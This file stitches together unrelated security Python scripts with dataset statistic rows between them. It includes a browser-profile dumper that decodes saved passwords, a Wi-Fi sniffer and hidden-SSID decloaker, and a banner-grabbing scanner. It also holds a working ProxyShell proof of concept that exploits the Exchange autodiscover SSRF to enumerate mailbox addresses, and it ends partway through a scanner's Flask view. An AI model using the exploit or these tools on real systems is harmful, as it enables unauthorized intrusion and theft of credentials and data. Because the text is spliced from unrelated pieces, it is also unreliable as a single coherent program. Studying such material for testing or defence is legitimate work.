				shutil.copy2(file, directory)
				print ("Copy "+file+" in "+directory)
			total = total + 1
	contador['Thumbnails'] = total
##############################################################################################################
def show_title(varText,varSize):
	"""Print a section banner: varText (framed by newlines) centred in a
	line of '=' characters of total width varSize.
	"""
	banner = ("\n" + varText + "\n").center(varSize, "=")
	print ("\n")
	print (banner)
	print ("\n")
##############################################################################################################
def show_cert_override(varDir):
	"""Dump certificate overrides from cert_override.txt.

	Each non-comment line holds: site, hash algorithm and fingerprint.
	Stores the number of entries (file lines minus the two header comment
	lines) in contador['Cert'].  Silently returns if the file is absent.
	"""
	if sys.platform.startswith('win') == True:
		ruta = varDir+"\\cert_override.txt"
	else:
		ruta = varDir+"/cert_override.txt"
	if path.isfile(ruta) == False:
		return
	lineas = open(ruta).readlines()
	show_title("Cert override "+show_sha256(ruta), 302)
	contador['Cert'] = len(lineas)-2
	# Iterate the lines directly: the old code looped over the list while
	# indexing it with a separate manual counter and an unused loop variable.
	for linea in lineas:
		campos = linea.split()
		if campos[0].startswith("#") == False:
			print("Site: %s" % campos[0])
			print("Hash Algorithm: %s" % campos[1])
			print(campos[2])
			print ("\n")
###############################################################################################################
def show_watch(varDir,watchtext = 1):
	"""Run this script under watch(1) every 4 seconds showing session data
	(Unix only).  When 'watchtext' is a string, the output is piped through
	grep to filter it.  Requires the python3_path file-header variable.
	"""
	if sys.platform.startswith('win'):
		print ("\n--Watch option not supported on Windows!\n")
		return
	if python3_path == "":
		print ("\n[ERROR]: Edit the header of dumpzilla.py and add the python3 path to the variable 'python3_path'.\nExample: python3_path = '/usr/bin/python3.3'\n")
		sys.exit()
	base = ["watch", "-n", "4", python3_path, path.abspath(__file__), varDir, "--Session2"]
	if watchtext == 1:
		call(base)
	else:
		call(base + ["| grep --group-separator '' -A 2 -B 2 -i", "'"+watchtext+"'"])
###############################################################################################################
def show_help():
	"""Print the command-line usage of dumpzilla and terminate the program
	via sys.exit().
	"""
	mensaje = """
Version: 15/03/2013
Usage: python dumpzilla.py browser_profile_directory [Options]
Options:
--All (Shows everything but the DOM data. Doesn't extract thumbnails or HTML 5 offline)
--Cookies [-showdom -domain <string> -name <string> -hostcookie <string> -access <date> -create <date> -secure <0/1> -httponly <0/1> -range_last -range_create <start> <end>]
--Permissions [-host <string>]
--Downloads [-range <start> <end>]
--Forms [-value <string> -range_forms <start> <end>]
--History [-url <string> -title <string> -date <date> -range_history <start> <end> -frequency]
--Bookmarks [-range_bookmarks <start> <end>]
--Cacheoffline [-range_cacheoff <start> <end> -extract <directory>]
--Thumbnails [-extract_thumb <directory>]
--Range <start date> <end date>
--Addons
--Passwords (Decode only in Unix)
--Certoverride
--Session
--Watch [-text <string>] (Shows in daemon mode the URLs and text form in real time. -text' Option allow filter, support all grep Wildcards. Exit: Ctrl + C. only Unix).
Wildcards: '%' Any string of any length (Including zero length)
'_' Single character
'\\' Escape character
Date syntax: YYYY-MM-DD HH:MM:SS
Win profile: 'C:\\Documents and Settings\\xx\\Application Data\\Mozilla\\Firefox\\Profiles\\xxxx.default'
Unix profile: '/home/xx/.mozilla/seamonkey/xxxx.default/'\n"""
	print (mensaje)
	sys.exit()
############################################################################################################### Main
# libnss3 (NSS) is loaded via ctypes on Unix only: it is used later to decode
# the stored Firefox passwords.  secuPWData/SECItem/PW_NONE are the ctypes
# structures/constants defined earlier in this file.
if sys.platform.startswith('win') == False:
	libnss = CDLL("libnss3.so")
	pwdata = secuPWData()
	pwdata.source = PW_NONE
	pwdata.data=0
	uname = SECItem()
	passwd = SECItem()
	dectext = SECItem()
# showAll becomes 0 when --All is requested; count is the argv position
# counter used while parsing the command line below.
showAll = 1
count = 0
# Per-feature result counters filled in by the show_* functions and printed
# in the "Total information" summary at the end of the run.
contador = {'Cookies': "0", 'Preferences': "0", 'Addons': "0",'Extensions': "0", 'Downloads': "0",'Downloads_History': "0", 'Forms': "0", 'History': "0", 'Bookmarks': "0", 'DOM': "0", 'DOMshow': "0", 'SearchEngines': "0", 'Passwords':"0", 'Passwords_decode': "0", 'Cacheoffline': "0", 'Cacheoffline_extract': "0", 'Cert': "0",'Thumbnails': "0", 'Session1': "0", 'Session2': "0"}
# ----------------------------------------------------------------------------
# Command-line entry point: sys.argv[1] must be the profile directory; every
# later token is an option flag or the value of the preceding flag.  Option
# flags set a var*OK variable to 0 ("enabled") and option values are fetched
# by position (sys.argv[count+1] / [count+2]).
# ----------------------------------------------------------------------------
if len(sys.argv) == 1:
	show_help()
else:
	varDir = sys.argv[1]
	if path.isdir(varDir) == True and len(sys.argv) == 2:
		show_help()
	elif path.isdir(varDir) == True and len(sys.argv) > 2:
		# Defaults: 1 means "feature disabled"; '%' is the SQL LIKE
		# wildcard; the two dates are an effectively unbounded range.
		varCookieOK = 1
		varDom = 1
		varDomain = "%"
		varName = "%"
		varHost = "%"
		varLastacess = "%"
		varCreate = "%"
		varSecure = "%"
		varHttp = "%"
		varRangeLast1 = "1991-08-06 00:00:00"
		varRangeLast2 = "3000-01-01 00:00:00"
		varRangeCreate1 = "1991-08-06 00:00:00"
		varRangeCreate2 = "3000-01-01 00:00:00"
		varPermissionsOK = 1
		varHostPreferences = "%"
		varAddonOK = 1
		varDownloadsOK = 1
		varDownloadRange1 = "1991-08-06 00:00:00"
		varDownloadRange2 = "3000-01-01 00:00:00"
		varFormsOK = 1
		varFormsValue = '%'
		varFormRange1 = "1991-08-06 00:00:00"
		varFormRange2 = "3000-01-01 00:00:00"
		varHistoryOK = 1
		varFrequency = 1
		varURL = '%'
		varTitle = '%'
		varDate = '%'
		varRange1 = "1991-08-06 00:00:00"
		varRange2 = "3000-01-01 00:00:00"
		varBookmarksOK = 1
		varBookmarkRange1 = "1991-08-06 00:00:00"
		varBookmarkRange2 = "3000-01-01 00:00:00"
		varPasswordsOK = 1
		varCacheoffOK = 1
		varCacheoffRange1 = "1991-08-06 00:00:00"
		varCacheoffRange2 = "3000-01-01 00:00:00"
		varExtract = 1
		varCertOK = 1
		varThumbOK = 1
		directory = 'null'
		varSessionOK = 1
		varSession2OK = 1
		watchtext = 1
		varWatchOK = 1
		for arg in sys.argv:
			# count > 1 skips the program name and the profile directory.
			if arg.startswith("-") == True and count > 1:
				# Whitelist of every known option; anything else aborts.
				# (NOTE: "-range_last" appears twice in this condition.)
				if arg != "--All" and arg != "--Range" and arg != "--Cookies" and arg != "-showdom" and arg != "-domain" and arg != "-name" and arg != "-hostcookie" and arg != "-access" and arg != "-create" and arg != "-secure" and arg != "-httponly" and arg != "-range_last" and arg != "-range_last" and arg != "-range_create" and arg != "--Permissions" and arg != "-host" and arg != "--Addons" and arg != "--Downloads" and arg != "-range" and arg != "--Forms" and arg != "-value" and arg != "-range_forms" and arg != "--History" and arg != "-url" and arg != "-frequency" and arg != "-title" and arg != "-date" and arg != "-range_history" and arg != "--Bookmarks" and arg != "-range_bookmarks" and arg != "--Passwords" and arg != "--Cacheoffline" and arg != "-range_cacheoff" and arg != "-extract" and arg != "--Certoverride" and arg != "--Thumbnails" and arg != "-extract_thumb" and arg != "--Session" and arg != "--Watch" and arg != "-text" and arg != "--Session2":
					print("\n[ERROR] "+str(arg)+" : Invalid argument !")
					show_help()
			if arg == "--All":
				showAll = 0
			# --Range applies one date range to every range-capable feature.
			if arg == "--Range":
				varCookieOK = 0
				varRangeLast1 = sys.argv[count+1]
				varRangeLast2 = sys.argv[count+2]
				varDownloadsOK = 0
				varDownloadRange1 = sys.argv[count+1]
				varDownloadRange2 = sys.argv[count+2]
				varFormsOK = 0
				varFormRange1 = sys.argv[count+1]
				varFormRange2 = sys.argv[count+2]
				varHistoryOK = 0
				varRange1 = sys.argv[count+1]
				varRange2 = sys.argv[count+2]
				varBookmarksOK = 0
				varBookmarkRange1 = sys.argv[count+1]
				varBookmarkRange2 = sys.argv[count+2]
				varCacheoffOK = 0
				varCacheoffRange1 = sys.argv[count+1]
				varCacheoffRange2 = sys.argv[count+2]
			# Sub-options are only honoured after their parent flag has
			# enabled the matching feature (var*OK == 0).
			if arg == "--Cookies":
				varCookieOK = 0
			elif arg == "-showdom" and varCookieOK == 0:
				varDom = 0
			elif arg == "-domain" and varCookieOK == 0:
				varDomain = sys.argv[count+1]
			elif arg == "-name" and varCookieOK == 0:
				varName = sys.argv[count+1]
			elif arg == "-hostcookie" and varCookieOK == 0:
				varHost = sys.argv[count+1]
			elif arg == "-access" and varCookieOK == 0:
				varLastacess = sys.argv[count+1]
			elif arg == "-create" and varCookieOK == 0:
				varCreate = sys.argv[count+1]
			elif arg == "-secure" and varCookieOK == 0:
				varSecure = sys.argv[count+1]
			elif arg == "-httponly" and varCookieOK == 0:
				varHttp = sys.argv[count+1]
			elif arg == "-range_last" and varCookieOK == 0:
				varRangeLast1 = sys.argv[count+1]
				varRangeLast2 = sys.argv[count+2]
			elif arg == "-range_create" and varCookieOK == 0:
				varRangeCreate1 = sys.argv[count+1]
				varRangeCreate2 = sys.argv[count+2]
			elif arg == "--Permissions":
				varPermissionsOK = 0
			elif arg == "-host" and varPermissionsOK == 0:
				varHostPreferences = sys.argv[count+1]
			elif arg == "--Addons":
				varAddonOK = 0
			elif arg == "--Downloads":
				varDownloadsOK = 0
			elif arg == "-range" and varDownloadsOK == 0:
				varDownloadRange1 = sys.argv[count+1]
				varDownloadRange2 = sys.argv[count+2]
			elif arg == "--Forms":
				varFormsOK = 0
			elif arg == "-value" and varFormsOK == 0:
				varFormsValue = sys.argv[count+1]
			elif arg == "-range_forms" and varFormsOK == 0:
				varFormRange1 = sys.argv[count+1]
				varFormRange2 = sys.argv[count+2]
			elif arg == "--History":
				varHistoryOK = 0
			elif arg == "-url" and varHistoryOK == 0:
				varURL = sys.argv[count+1]
			elif arg == "-frequency" and varHistoryOK == 0:
				varFrequency = 0
			elif arg == "-title" and varHistoryOK == 0:
				varTitle = sys.argv[count+1]
			elif arg == "-date" and varHistoryOK == 0:
				varDate = sys.argv[count+1]
			elif arg == "-range_history" and varHistoryOK == 0:
				varRange1 = sys.argv[count+1]
				varRange2 = sys.argv[count+2]
			elif arg == "--Bookmarks":
				varBookmarksOK = 0
			elif arg == "-range_bookmarks" and varBookmarksOK == 0:
				varBookmarkRange1 = sys.argv[count+1]
				varBookmarkRange2 = sys.argv[count+2]
			elif arg == "--Passwords":
				varPasswordsOK = 0
			elif arg == "--Cacheoffline":
				varCacheoffOK = 0
			elif arg == "-range_cacheoff" and varCacheoffOK == 0:
				varCacheoffRange1 = sys.argv[count+1]
				varCacheoffRange2 = sys.argv[count+2]
			elif arg == "-extract" and varCacheoffOK == 0:
				varExtract = 0
				directory = sys.argv[count+1]
			elif arg == "--Certoverride":
				varCertOK = 0
			elif arg == "--Thumbnails":
				varThumbOK = 0
			elif arg == "-extract_thumb" and varThumbOK == 0:
				directory = sys.argv[count+1]
			elif arg == "--Session":
				varSessionOK = 0
			elif arg == "--Session2":
				varSession2OK = 0
			elif arg == "--Watch":
				varWatchOK = 0
			elif arg == "-text" and varWatchOK == 0:
				watchtext = sys.argv[count+1]
			count = count+1
		# Dispatch: run every feature whose flag was enabled above.
		show_info_header()
		if showAll == 0:
			All_execute(varDir)
		if varCookieOK == 0:
			show_cookies_firefox(varDir,varDom,varDomain,varName,varHost,varLastacess,varCreate,varSecure,varHttp,varRangeLast1,varRangeLast2,varRangeCreate1,varRangeCreate2)
		if varPermissionsOK == 0:
			show_permissions_firefox(varDir,varHostPreferences)
			show_preferences_firefox(varDir)
		if varAddonOK == 0:
			show_addons_firefox(varDir)
			show_extensions_firefox(varDir)
			show_search_engines(varDir)
			show_info_addons(varDir)
		if varDownloadsOK == 0:
			show_downloads_firefox(varDir,varDownloadRange1,varDownloadRange2)
			show_downloads_history_firefox(varDir,varDownloadRange1,varDownloadRange2)
			show_downloadsdir_firefox(varDir)
		if varFormsOK == 0:
			show_forms_firefox(varDir,varFormsValue,varFormRange1,varFormRange2)
		if varHistoryOK == 0:
			show_history_firefox(varDir, varURL, varFrequency, varTitle, varDate, varRange1, varRange2)
		if varBookmarksOK == 0:
			show_bookmarks_firefox(varDir,varBookmarkRange1,varBookmarkRange2)
		if varPasswordsOK == 0:
			show_passwords_firefox(varDir)
		if varCacheoffOK == 0:
			show_cache_offline(varDir,varCacheoffRange1,varCacheoffRange2)
		if varCacheoffOK == 0 and varExtract == 0:
			show_cache_offline_extract(varDir, directory)
		if varCertOK == 0:
			show_cert_override(varDir)
		if varThumbOK == 0:
			show_thumbnails(varDir, directory)
		if varSessionOK == 0:
			show_session(varDir)
		if varSession2OK == 0:
			extract_data_session_watch(varDir)
		if varWatchOK == 0:
			show_watch(varDir,watchtext)
		# Final summary -- skipped for --Session2, which is used by --Watch
		# in daemon mode and must produce raw output only.
		if varSession2OK == 1:
			show_title("Total information", 243)
			if varCookieOK == 0 or showAll == 0:
				print ("Total Cookies: "+str(contador['Cookies']))
				print ("Total DOM Data displayed: "+str(contador['DOM']))
				if varDom == 1 and showAll == 1:
					print (contador['DOMshow'])
			if varPermissionsOK == 0 or showAll == 0:
				print ("Total Permissions: "+str(contador['Preferences']))
			if varAddonOK == 0 or showAll == 0:
				print ("Total Addons: "+str(contador['Addons']))
				print ("Total Extensions (Extensions / Themes): "+str(contador['Extensions']))
				print ("Total Search Engines: "+str(contador['SearchEngines']))
			if varDownloadsOK == 0 or showAll == 0:
				print ("Total Downloads: "+str(contador['Downloads']))
				print ("Total History downloads: "+str(contador['Downloads_History']))
			if varFormsOK == 0 or showAll == 0:
				print ("Total Forms: "+str(contador['Forms']))
			if varHistoryOK == 0 or showAll == 0:
				print ("Total urls in History: "+str(contador['History']))
			if varBookmarksOK == 0 or showAll == 0:
				print ("Total urls in Bookmarks: "+str(contador['Bookmarks']))
			if varPasswordsOK == 0 or showAll == 0:
				print ("Total passwords: "+str(contador['Passwords']))
				print ("Total passwords decode: "+str(contador['Passwords_decode']))
			if varCacheoffOK == 0 or showAll == 0:
				print ("Total files in offlineCache: "+str(contador['Cacheoffline']))
			if varCacheoffOK == 0 and showAll == 1:
				print ("Total extract files in offlineCache (-extract): "+str(contador['Cacheoffline_extract']))
			if varCertOK == 0 or showAll == 0:
				print ("Total Certificated override: "+str(contador['Cert']))
			if varThumbOK == 0 or showAll == 0:
				print ("Total Images Thumbnails: "+str(contador['Thumbnails']))
			if varSessionOK == 0 or showAll == 0:
				print ("Total webs in last session: "+str(contador['Session1']))
				print ("Total webs in backup session: "+str(contador['Session2']))
			print ("\n")
	else:
		show_help()
		sys.exit()
# Site: www.dumpzilla.org
# Author: Busindre ( busilezas[@]gmail.com )
# Version: 15/03/2013
| 42.130894 | 974 | 0.561847 |
cybersecurity-penetration-testing | # Volatility
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
@author: Holger Macht
@license: GNU General Public License 2.0 or later
@contact: holger@homac.de
"""
import volatility.obj as obj
import volatility.plugins.linux.flags as linux_flags
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.dalvik_find_gdvm_offset as dalvik_find_gdvm_offset
import volatility.plugins.linux.dalvik as dalvik
import sys, traceback
class dalvik_vms(linux_common.AbstractLinuxCommand):
    """Gather informationen about the Dalvik VMs running in the system"""

    def __init__(self, config, *args, **kwargs):
        linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
        # Expose the shared dalvik options (--GDVM_OFFSET / --PID) on this plugin.
        dalvik.register_option_GDVM_OFFSET(self._config)
        dalvik.register_option_PID(self._config)

    def calculate(self):
        """Yield (task, DvmGlobals) for each process mapping libdvm's data section.

        The gDvm offset is the same in every process, so it is resolved once:
        taken from --GDVM_OFFSET (hex string) when given, otherwise located by
        the dalvik_find_gdvm_offset plugin.  (An unused `offset` local in the
        original has been removed.)
        """
        if self._config.GDVM_OFFSET:
            # argument is given in hex
            gDvmOffset = int(self._config.GDVM_OFFSET, 16)
        else:
            gDvmOffset = dalvik_find_gdvm_offset.dalvik_find_gdvm_offset(self._config).calculate()
        for task, vma in dalvik.get_data_section_libdvm(self._config):
            gDvm = obj.Object('DvmGlobals', offset = vma.vm_start + gDvmOffset, vm = task.get_process_address_space())
            # sanity check: Is this a valid DvmGlobals object?
            #if not dalvik.isDvmGlobals(gDvm):
            #    continue
            yield task, gDvm

    def render_text(self, outfd, data):
        """Render one table row per Dalvik VM yielded by calculate()."""
        self.table_header(outfd, [("PID", "5"),
                                  ("name", "15"),
                                  ("heapStartingSize", "15"),
                                  ("heapMaximumSize", "15"),
                                  ("heapGrowthLimit", "15"),
                                  ("stackSize", "10"),
                                  ("tableSize", "10"),
                                  ("numDeadEntries", "15"),
                                  ("numEntries", "15")])
        for task, dvm in data:
            self.table_row(outfd,
                           task.pid,
                           task.comm,
                           dvm.heapStartingSize,
                           dvm.heapMaximumSize,
                           dvm.heapGrowthLimit,
                           dvm.stackSize,
                           dvm.loadedClasses.dereference().tableSize,
                           dvm.loadedClasses.dereference().numDeadEntries,
                           dvm.loadedClasses.dereference().numEntries)
| 40.2625 | 118 | 0.58697 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import os
import sys
def retBanner(ip, port):
    """Connect to ip:port and return the first 1024 bytes the service sends
    (its banner), or None on any connection failure or timeout.

    A 2-second default timeout keeps dead hosts from stalling the scan.
    The socket is always closed, even on error -- the original leaked the
    descriptor on every timeout/refused connection.
    """
    socket.setdefaulttimeout(2)
    s = socket.socket()
    try:
        s.connect((ip, port))
        return s.recv(1024)
    except socket.error:
        # Closed port, unreachable host or timeout: signal "no banner".
        return None
    finally:
        s.close()
def checkVulns(banner, filename):
f = open(filename, 'r')
for line in f.readlines():
if line.strip('\n') in banner:
print '[+] Server is vulnerable: ' +\
banner.strip('\n')
def main():
    """Banner-grab a hard-coded IP range and flag known-vulnerable services.

    Usage: script.py <vuln filename>, where the file holds one vulnerable
    banner substring per line. Scans 192.168.95.147-149 on common ports.
    """
    # Exactly one argument (the vulnerability file) is required; it must
    # exist and be readable, otherwise exit with a usage/error message.
    if len(sys.argv) == 2:
        filename = sys.argv[1]
        if not os.path.isfile(filename):
            print '[-] ' + filename +\
                ' does not exist.'
            exit(0)
        if not os.access(filename, os.R_OK):
            print '[-] ' + filename +\
                ' access denied.'
            exit(0)
    else:
        print '[-] Usage: ' + str(sys.argv[0]) +\
            ' <vuln filename>'
        exit(0)
    # Common service ports: FTP, SSH, SMTP, HTTP, POP3, HTTPS.
    portList = [21,22,25,80,110,443]
    # NOTE(review): scan range is hard-coded to 192.168.95.147-149.
    for x in range(147, 150):
        ip = '192.168.95.' + str(x)
        for port in portList:
            banner = retBanner(ip, port)
            if banner:
                print '[+] ' + ip + ' : ' + banner
                checkVulns(banner, filename)


if __name__ == '__main__':
    main()
| 21.37931 | 50 | 0.474942 |
cybersecurity-penetration-testing | import socket
import sys, os, signal

# Raw 802.11 beacon sniffer: bind an AF_PACKET raw socket to the
# monitor-mode interface "mon0" (protocol 0x0003 == ETH_P_ALL) and print
# SSID/BSSID/channel for every distinct access point seen.
sniff = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 3)
sniff.bind(("mon0", 0x0003))
ap_list =[]
while True :
    fm1 = sniff.recvfrom(6000)
    fm= fm1[0]
    # 0x80 at this offset marks a beacon frame -- assumes a fixed-size
    # radiotap header, so the hard-coded offsets below break for other
    # header lengths (NOTE: confirm against the capture driver).
    if fm[26] == "\x80" :
        # bytes 36:42 hold the BSSID (AP MAC); report each AP only once
        if fm[36:42] not in ap_list:
            ap_list.append(fm[36:42])
            a = ord(fm[63])  # length of the SSID tag that follows
            print "SSID -> ",fm[64:64 +a],"-- BSSID -> ", \
                fm[36:42].encode('hex'),"-- Channel -> ", ord(fm[64 +a+12])
| 23.058824 | 60 | 0.590686 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
from scapy.all import *
interface = 'mon0'
hiddenNets = []
unhiddenNets = []
def sniffDot11(p):
    """scapy per-packet callback that decloaks hidden wireless networks.

    A beacon with an empty SSID marks a cloaked network; a later probe
    response from the same MAC reveals the real SSID. State is kept in
    the module-level hiddenNets / unhiddenNets lists.
    """
    if p.haslayer(Dot11ProbeResp):
        addr2 = p.getlayer(Dot11).addr2
        # Only report MACs previously seen as hidden and not yet decloaked.
        if (addr2 in hiddenNets) & (addr2 not in unhiddenNets):
            netName = p.getlayer(Dot11ProbeResp).info
            print '[+] Decloaked Hidden SSID : ' +\
                netName + ' for MAC: ' + addr2
            unhiddenNets.append(addr2)
    if p.haslayer(Dot11Beacon):
        # An empty info field in a beacon identifies a hidden SSID.
        if p.getlayer(Dot11Beacon).info == '':
            addr2 = p.getlayer(Dot11).addr2
            if addr2 not in hiddenNets:
                print '[-] Detected Hidden SSID: ' +\
                    'with MAC:' + addr2
                hiddenNets.append(addr2)

# Capture forever on the monitor interface, feeding frames to the callback.
sniff(iface=interface, prn=sniffDot11)
| 25.0625 | 63 | 0.563025 |
thieves-tools | from setuptools import setup, find_packages
# pip install --editable .
setup(
    # Distribution metadata for the thieves-tools CLI package.
    name='thieves-tools',
    author='Drake Axelrod',
    description='Information about useful pen-testing tools in addition to any reusable scripts I myself have written',
    version='0.0.1',
    packages=find_packages(),
    include_package_data=True,
    # Single-module code lives in thvtools.py alongside the packages.
    py_modules=['thvtools'],
    python_requires='>=3.10',
    install_requires=[
        'click',
        'beautifulsoup4',
        'pywebview'
    ],
    entry_points={
        # Installs a `thvtools` console command bound to thvtools:cli.
        'console_scripts': [
            'thvtools=thvtools:cli'
        ]
    }
)
| 23.12 | 119 | 0.60299 |
Effective-Python-Penetration-Testing | from Crypto.Cipher import AES
import os, random, struct
def decrypt_file(key, filename, chunk_size=24*1024):
    """Decrypt `filename` (AES-CBC) into the same path minus its extension.

    File layout produced by the matching encryptor: an 8-byte little-endian
    original size, a 16-byte IV, then the padded ciphertext. The output is
    truncated back to the original size to drop block padding.
    """
    output_filename = os.path.splitext(filename)[0]
    with open(filename, 'rb') as infile:
        size_field = infile.read(struct.calcsize('Q'))
        origsize = struct.unpack('<Q', size_field)[0]
        iv = infile.read(16)
        decryptor = AES.new(key, AES.MODE_CBC, iv)
        with open(output_filename, 'wb') as outfile:
            for block in iter(lambda: infile.read(chunk_size), b''):
                outfile.write(decryptor.decrypt(block))
            outfile.truncate(origsize)
decrypt_file('abcdefghji123456', 'sample-file.txt.encrypted'); | 31.636364 | 76 | 0.594142 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Assist manual XSS testing by listing online XSS resources."""
    links = get_resources("ExternalCrossSiteScripting")
    return plugin_helper.resource_linklist("Online Resources", links)
| 28.181818 | 75 | 0.784375 |
owtf | """
SEMI-PASSIVE Plugin for Testing for HTTP Methods and XST (OWASP-CM-008)
"""
from owtf.managers.resource import get_resources
from owtf.managers.target import get_targets_as_list
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Normal request for HTTP methods analysis"
def run(PluginInfo):
    """Record an OPTIONS transaction per target URL for HTTP-method/XST
    analysis, then append the configured external command output."""
    resources = get_resources("SemiPassiveHTTPMethods")
    report = plugin_helper.TransactionTableForURLList(
        True, get_targets_as_list(["target_url", "top_url"]), "OPTIONS"
    )
    # No previous output to merge with the command dump.
    report += plugin_helper.CommandDump(
        "Test Command", "Output", resources, PluginInfo, []
    )
    return report
| 29.904762 | 71 | 0.719136 |
Mastering-Kali-Linux-for-Advanced-Penetration-Testing-4E | #!/usr/bin/env python3
#
# Credits to - https://github.com/dmaasland/proxyshell-poc
import argparse
import random
import string
import requests
import sys
import xml.etree.ElementTree as ET
class ProxyShell:
    """Session wrapper for the ProxyShell autodiscover SSRF.

    The Cookie header abuses /autodiscover/autodiscover.json so every
    request issued through post() is proxied by Exchange to an internal
    backend endpoint.
    """

    def __init__(self, exchange_url, verify=False):
        # Normalise the target to an https:// URL.
        if exchange_url.startswith('https://'):
            self.exchange_url = exchange_url
        else:
            self.exchange_url = f'https://{exchange_url}'
        # A random mailbox makes each run's SSRF cookie unique.
        self.rand_email = f'{rand_string()}@{rand_string()}.{rand_string(3)}'
        self.session = requests.Session()
        self.session.verify = verify
        self.session.headers = {
            'Cookie': f'Email=autodiscover/autodiscover.json?a={self.rand_email}'
        }

    def post(self, endpoint, data, headers={}):
        # NOTE: the mutable default is never modified here, so it is safe.
        target = (
            f'{self.exchange_url}/autodiscover/autodiscover.json'
            f'?a={self.rand_email}{endpoint}'
        )
        return self.session.post(url=target, data=data, headers=headers)
def rand_string(n=5):
    """Return a random string of n lowercase ASCII letters (default 5)."""
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(n))
def get_args():
    """Parse command-line options; -u (Exchange URL) is mandatory."""
    arg_parser = argparse.ArgumentParser(description='ProxyShell example')
    arg_parser.add_argument('-u', help='Exchange URL', required=True)
    return arg_parser.parse_args()
def get_emails(proxyshell):
    """Enumerate directory mailboxes through the SSRF via EWS ResolveNames.

    Sends a SOAP ResolveNames request with the bare prefix "SMTP:" so the
    server resolves every Active Directory entry, then prints each
    EmailAddress element found in the response.
    """
    # ResolveNames SOAP envelope (Exchange 2016 schema version).
    data = '''
    <soap:Envelope
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
        xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
        xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Header>
            <t:RequestServerVersion Version="Exchange2016" />
        </soap:Header>
        <soap:Body>
            <m:ResolveNames ReturnFullContactData="true" SearchScope="ActiveDirectory">
                <m:UnresolvedEntry>SMTP:</m:UnresolvedEntry>
            </m:ResolveNames>
        </soap:Body>
    </soap:Envelope>
    '''
    headers = {
        'Content-Type': 'text/xml'
    }
    r = proxyshell.post(
        f'/EWS/exchange.asmx',
        data=data,
        headers=headers
    )
    email_xml = ET.fromstring(r.content)
    # The {*} wildcards match any XML namespace at each level of the path.
    emails = email_xml.findall(
        '{*}Body/{*}ResolveNamesResponse/{*}ResponseMessages/{*}ResolveNamesResponseMessage/{*}ResolutionSet/{*}Resolution/{*}Mailbox/{*}EmailAddress'
    )
    for email in emails:
        print(f'Found address: {email.text}')
def main():
    """Entry point: parse arguments, build the SSRF session, dump emails."""
    options = get_args()
    shell = ProxyShell(options.u)
    get_emails(shell)
if __name__ == '__main__':
    # Silence TLS certificate warnings: the session is created with
    # verify=False because targets typically use self-signed certs.
    requests.packages.urllib3.disable_warnings(
        requests.packages.urllib3.exceptions.InsecureRequestWarning
    )
    # f-strings with '=' style usage and other syntax here need >= 3.8.
    if not (sys.version_info.major == 3 and sys.version_info.minor >= 8):
        print("This script requires Python 3.8 or higher!")
        print("You are using Python {}.{}.".format(
            sys.version_info.major, sys.version_info.minor))
        sys.exit(1)
    main()
| 25.272727 | 150 | 0.638975 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-10
# @File : vul_scanner.py
# @Desc : ""
import time
from flask import Blueprint, render_template, request, redirect, url_for, jsonify
from bson import ObjectId
from threading import Thread
from lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.modules.scanner.poc_scanner import PocsuiteScanner
from fuxi.views.authenticate import login_check
vul_scanner = Blueprint('vul_scanner', __name__)
tasks_db = db_name_conf()['tasks_db']
asset_db = db_name_conf()['asset_db']
server_db = db_name_conf()['server_db']
subdomain_db = db_name_conf()['subdomain_db']
vul_db = db_name_conf()['vul_db']
plugin_db = db_name_conf()['plugin_db']
# tasks view
@vul_scanner.route('/task-management')
@login_check
def tasks_view():
    """Task list page, plus AJAX sub-actions selected by query parameter:
    delete (remove task, soft-delete its findings), rescan (reset status
    and relaunch the scanner thread) and edit (return task info as JSON).
    """
    # delete task: remove it and tag all its vulnerabilities as deleted
    if request.args.get('delete'):
        task_id = request.args.get('delete')
        connectiondb(tasks_db).delete_one({'_id': ObjectId(task_id)})
        connectiondb(vul_db).update({'task_id': ObjectId(task_id)}, {"$set": {"tag": "delete"}}, multi=True)
        return "success"
    # rescan: reset status, soft-delete old findings, restart scan thread
    elif request.args.get('rescan'):
        task_id = request.args.get('rescan')
        connectiondb(tasks_db).update_one({'_id': ObjectId(task_id)}, {'$set': {'task_status': 'Preparation'}})
        if connectiondb(vul_db).find_one({"task_id": ObjectId(task_id)}):
            connectiondb(vul_db).update({'task_id': ObjectId(task_id)}, {"$set": {"tag": "delete"}}, multi=True)
        try:
            scanner = PocsuiteScanner(ObjectId(task_id))
            t1 = Thread(target=scanner.set_scanner, args=())
            t1.start()
            return "success"
        except Exception as e:
            raise e
    # get task info for edit (get)
    elif request.args.get('edit'):
        task_id = request.args.get('edit')
        task_edit_data = connectiondb(tasks_db).find_one({'_id': ObjectId(task_id)})
        task_edit_data_json = {
            'task_name': task_edit_data['task_name'],
            'scan_target': '\n'.join(task_edit_data['scan_target']),
        }
        return jsonify(task_edit_data_json)
    # default task view: all tasks, most recently finished first
    task_data = connectiondb(tasks_db).find().sort('end_date', -1)
    return render_template('task-management.html', task_data=task_data)
# task edit
@vul_scanner.route('/task-edit', methods=['POST'])
@login_check
def tasks_edit():
    """Persist edited task fields, then restart the scan in a background
    thread. Returns 'success' on update (None if the Mongo update failed).
    """
